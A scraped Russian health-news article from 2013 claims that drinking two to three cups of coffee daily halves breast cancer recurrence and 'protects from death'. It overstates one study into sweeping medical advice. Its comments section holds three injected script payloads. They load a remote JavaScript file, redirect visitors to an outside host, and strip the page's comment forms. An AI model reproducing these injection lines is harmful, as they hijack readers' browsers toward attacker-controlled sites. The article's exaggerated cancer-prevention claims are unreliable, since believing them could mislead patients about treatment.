Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кофе спасет от рака груди...  >>  Кофе спасет от рака груди! Сколько пить, чтобы избежать смерти?
 
Обратная связь
 

Кофе спасет от рака груди! Сколько пить, чтобы избежать смерти?

Размер шрифта
27 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Татьяна Дубровская
Здоровье инфо
  • google_analytics: false
  • Нравится

Новейшее исследовании шведских ученных, в котором участвовали 600 женщин в течение 5 лет, показали, что обычный кофе может спасти женщин от самого частого рака!

Что пить, чтобы не было рака груди?

Около половины женщин принимали в качестве противоопухолевой терапии препарат Тамоксифен. Все женщины пили по 2-3 чашки кофе в день. В результате, выяснилось, что у тех женщин, которые сочетали противоопухолевый препарат с 2-3 чашками кофе, появление повторного рака снизились вдвое!

Тамоксифен – это препарат, обладающий противоопухолевыми свойствами. Механизм его действия – блокирование рецепторов эстрогенов в органах-мишенях (в исследовании орган-мишень – молочная железа). Опухоль молочной железы, как и опухоли остальных органов репродуктивной системы женщины, является гормонозависимой, то есть она растет при воздействии на нее женских половых гормонов эстрогенов. Именно поэтому лечение таких опухолей заключается в блокировании действия эстрогенов посредством применения антиэстрогенных препаратов.

Каким образом ежедневное употребление кофе снижало риск повторного возникновения опухоли, пока неизвестно. По одной из версий, кофеин каким-то образов активирует Тамоксифен и делает его более эффективным. В другой работе ученые выяснили, что кофеин можно использовать не только в комплексной терапии для лечения рака, но и в качестве профилактики рака молочной железы!

Так что пейте больше кофе! Кроме всем известной бодрости, кофеин сможет защитить вас от смерти, а ваших близких от потери любимой женщины!

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Носите лифчик на здоровье! Теперь не страшно!   Как выспаться ВСЕГО за 20 минут   Какой напиток лучший для сосудов?!   Всего одна таблетка в день – в 2 раза меньше случаев рака груди!  
26 июня 2013Что пить, чтобы не было рака груди? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Как похудеть, ничего не делая
Можно ли взбодриться без кофе?
Чем накормить мужчину для эрекции

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.